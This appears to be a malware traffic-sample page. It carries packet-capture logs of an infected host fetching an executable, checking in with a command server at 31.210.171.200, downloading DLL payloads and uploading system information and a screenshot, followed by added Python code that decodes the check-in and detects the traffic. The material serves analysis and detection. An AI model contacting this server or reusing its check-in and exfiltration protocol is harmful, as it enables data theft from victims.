Text Example

POST /gate/log.php 31.210.171.200 Malware Dropper Trojan Downloader PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap 1 (Date added: May 30, 2019 6:09 am; Added by: admin; File size: 7 MB; Downloads: 9)

2019-05-29 23:39:48.912311 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3097589712:3097590130, ack 2503829794, win 16425, length 418: HTTP: GET /1.exe HTTP/1.1
GET /1.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-29 23:39:49.588931 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 109501:110961, ack 418, win 237, length 1460: HTTP
[binary response body: a segment of 1.exe. The printable strings in it are Delphi VCL RTTI names from the Graphics unit (TColor, EInvalidGraphic, EInvalidGraphicOperation, TFontPitch, TFontName, TFontCharset, TFontStyle, TFontStyles, TPenStyle, TPenMode), characteristic of a Delphi-compiled executable. The HTTP response header for /1.exe is not in this excerpt.]

2019-05-29 23:39:49.590576 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 173741:175201, ack 418, win 237, length 1460: HTTP
[binary response body continues]
2019-05-29 23:40:00.458551 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 1054931223:1054931413, ack 2808420310, win 16425, length 190: HTTP: POST /gate/log.php HTTP/1.1
POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 31.210.171.200

2019-05-29 23:40:00.458560 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 190:345, ack 1, win 16425, length 155: HTTP
params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw=
2019-05-29 23:40:00.724098 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate","attachment_url":"http://31.210.171.200/gate/sqlite3.dll","libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}
0

2019-05-29 23:40:01.027541 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
[TCP retransmission of the preceding segment: same sequence range 1:567 and the same payload, resent about 300 ms later]
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate","attachment_url":"http://31.210.171.200/gate/sqlite3.dll","libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}
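Added example, not part of the captured sample: decoding the params= check-in above and pulling the tasking out of the JSON reply. The two bodies are copied verbatim from the capture; the base64 unwraps to a second query string whose field names (bot_id, config_id, data) come from the payload itself. The helper names and the layout of the returned dict are my own choices.

```python
import base64
import json
from urllib.parse import parse_qsl, urlsplit

# Copied from the capture: the POST /gate/log.php form body and the JSON reply.
CHECKIN_BODY = (
    "params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9"
    "NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw="
)
GATE_REPLY = (
    '{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde'
    '&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate",'
    '"attachment_url":"http://31.210.171.200/gate/sqlite3.dll",'
    '"libraries":"http://31.210.171.200/gate/libs.zip","ip":"73.135.186.44",'
    '"config":{"masks":null,"loader_urls":null}}'
)


def decode_checkin(body: str) -> dict:
    """Unwrap params=<base64>; the plaintext is itself a query string."""
    # partition, not parse_qsl: parse_qsl would turn a '+' inside the base64 into a space
    name, _, value = body.partition("=")
    if name != "params":
        raise ValueError("expected a single params= form field")
    inner = base64.b64decode(value, validate=True).decode("ascii")
    fields = dict(parse_qsl(inner, keep_blank_values=True))
    # bot_id is a GUID plus an underscore and a short suffix; config_id is 40 hex chars.
    # "null" is sent as a literal string when the bot attaches no data to the check-in.
    if fields.get("data") == "null":
        fields["data"] = None
    return fields


def parse_gate_reply(text: str) -> dict:
    """Extract the upload endpoint, the payloads to fetch and the victim's public IP."""
    reply = json.loads(text)
    upload = urlsplit(reply["url"])
    query = dict(parse_qsl(upload.query))
    return {
        "upload_host": upload.hostname,
        "upload_path": upload.path,
        "upload_hash": query.get("hash"),
        "upload_js": query.get("js"),
        "callback": query.get("callback"),
        "downloads": [reply["attachment_url"], reply["libraries"]],
        "victim_public_ip": reply["ip"],
        "config": reply["config"],
    }


if __name__ == "__main__":
    checkin = decode_checkin(CHECKIN_BODY)
    print("bot_id    :", checkin["bot_id"])
    print("config_id :", checkin["config_id"])
    tasking = parse_gate_reply(GATE_REPLY)
    for url in tasking["downloads"]:
        print("download  :", url)
    print("upload to :", tasking["upload_host"] + tasking["upload_path"])
```

The decoded check-in carries a per-bot GUID, a 40-hex-character config identifier and an empty data field; the reply tells the bot where to fetch sqlite3.dll and libs.zip and which file_handler URL (with hash, js and callback parameters) to upload its results to, and echoes the victim's public IP.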

2019-05-29 23:40:01.135113 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 2907559582:2907559879, ack 1455228641, win 16425, length 297: HTTP: GET /gate/sqlite3.dll HTTP/1.1
GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:03.662144 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 297:591, ack 917003, win 65335, length 294: HTTP: GET /gate/libs.zip HTTP/1.1
GET /gate/libs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:05.273384 IP 31.210.171.200.80 > 10.1.10.162.49189: Flags [P.], seq 3744744:3745578, ack 591, win 245, length 834: HTTP
[binary response body of /gate/libs.zip: a ZIP archive (PK local file headers). The entry names visible in this segment are api-ms-win-core-file-l2-1-0.dll, api-ms-win-core-handle-l1-1-0.dll, api-ms-win-core-heap-l1-1-0.dll, api-ms-win-core-interlocked-l1-1-0.dll, api-ms-win-core-libraryloader-l1-1-0.dll, api-ms-win-core-localization-l1-2-0.dll and api-ms-win-core-memory-l1-1-0.dll, the API-set forwarder DLLs that ship with the Universal CRT redistributable for pre-Windows 10 systems.]
2019-05-29 23:40:14.608543 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 345:689, ack 567, win 16283, length 344: HTTP: POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu
Content-Length: 63918
Host: 31.210.171.200

2019-05-29 23:40:15.012041 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 63469:64607, ack 567, win 16283, length 1138: HTTP
[final segment of the multipart body (Content-Length 63918): binary ZIP data. The ZIP entry names visible in this segment are System Info.txt and screen.png, followed by the closing boundary.]
--Jfbvjwj3489078yuyetu--
2019-05-29 23:40:15.573069 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 567:793, ack 64607, win 1252, length 226: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:15 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

d
true"success"
0
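Added example, not part of the captured sample: detection logic that replays the request sequence above against constructed HTTP transaction records. The records are hand-built from the capture (timestamps truncated to the second, bodies cut down to the fields the rules inspect) plus one benign control; the rule names, the record format and the 5-minute correlation window are my own choices. Two details of the capture drive the rules: the check-in is a bare params=<base64> field whose plaintext carries bot_id= and config_id=, and the upload's Content-Type is multipart/form-data, boundary=... with a comma, where RFC 2045 requires a semicolon between parameters, so the sender is a hand-rolled HTTP client rather than a browser or a standard library.

```python
import base64
import re
from datetime import datetime
from urllib.parse import unquote

# Constructed HTTP transaction records modelled on the capture above: one dict per
# request, timestamps truncated to the second, bodies reduced to what the rules read.
# The last record is a benign control that must not fire anything.
EVENTS = [
    {"ts": "2019-05-29 23:40:00", "src": "10.1.10.162", "host": "31.210.171.200",
     "method": "POST", "path": "/gate/log.php",
     "content_type": "application/x-www-form-urlencoded",
     "body": "params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9"
             "NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw="},
    {"ts": "2019-05-29 23:40:01", "src": "10.1.10.162", "host": "31.210.171.200",
     "method": "GET", "path": "/gate/sqlite3.dll", "content_type": "", "body": ""},
    {"ts": "2019-05-29 23:40:03", "src": "10.1.10.162", "host": "31.210.171.200",
     "method": "GET", "path": "/gate/libs.zip", "content_type": "", "body": ""},
    {"ts": "2019-05-29 23:40:14", "src": "10.1.10.162", "host": "31.210.171.200",
     "method": "POST",
     "path": "/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde"
             "&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate",
     "content_type": "multipart/form-data, boundary=Jfbvjwj3489078yuyetu", "body": ""},
    # benign control (constructed): a normal browser upload with a well-formed Content-Type
    {"ts": "2019-05-29 23:41:00", "src": "10.1.10.50", "host": "intranet.example",
     "method": "POST", "path": "/upload",
     "content_type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk", "body": ""},
]

PARAMS_FIELD = re.compile(r"^params=([A-Za-z0-9+/]+={0,2})$")
WINDOW_SECONDS = 300  # how long after a check-in follow-on requests are correlated (assumed)


def checkin_fields(body: str):
    """Return the decoded inner query string if body is params=<base64> carrying a bot id."""
    # unquote() restores %3D padding if a client percent-encodes it; it leaves '+' alone
    m = PARAMS_FIELD.match(unquote(body))
    if not m:
        return None
    try:
        inner = base64.b64decode(m.group(1), validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return inner if "bot_id=" in inner and "config_id=" in inner else None


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def scan(events):
    """Stateful pass over the records; returns (timestamp, rule, detail) tuples."""
    findings = []
    checkins = {}  # (client, server) -> time of the last base64 bot check-in
    for e in sorted(events, key=lambda r: r["ts"]):
        key = (e["src"], e["host"])
        ct = e["content_type"].lower()
        inner = checkin_fields(e["body"]) if e["method"] == "POST" else None
        if inner:
            checkins[key] = _ts(e["ts"])
            findings.append((e["ts"], "b64_bot_checkin", f'{e["path"]} -> {inner}'))
        if ct.startswith("multipart/form-data,"):
            # RFC 2045 separates Content-Type parameters with ';'; ',' marks a hand-rolled client
            findings.append((e["ts"], "malformed_multipart_ct", e["content_type"]))
        recent = (key in checkins
                  and (_ts(e["ts"]) - checkins[key]).total_seconds() <= WINDOW_SECONDS)
        if recent and e["method"] == "GET" and re.search(r"\.(dll|zip)$", e["path"], re.I):
            findings.append((e["ts"], "payload_fetch_after_checkin", e["path"]))
        if (recent and e["method"] == "POST" and ct.startswith("multipart/form-data")
                and "callback=" in e["path"]):
            findings.append((e["ts"], "upload_with_callback_after_checkin",
                             e["path"].split("?", 1)[0]))
    return findings


def rules_fired(events):
    """Just the rule names, in order, for quick checks."""
    return [rule for _, rule, _ in scan(events)]


if __name__ == "__main__":
    for ts, rule, detail in scan(EVENTS):
        print(ts, rule, detail)
```

Run on the constructed records, the four malicious requests produce one check-in finding, two payload-fetch findings and two findings on the upload (malformed Content-Type and a callback= upload after a check-in), while the control request produces nothing. The malformed Content-Type rule is stateless and fires even without a preceding check-in, which is useful when the capture starts mid-session.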
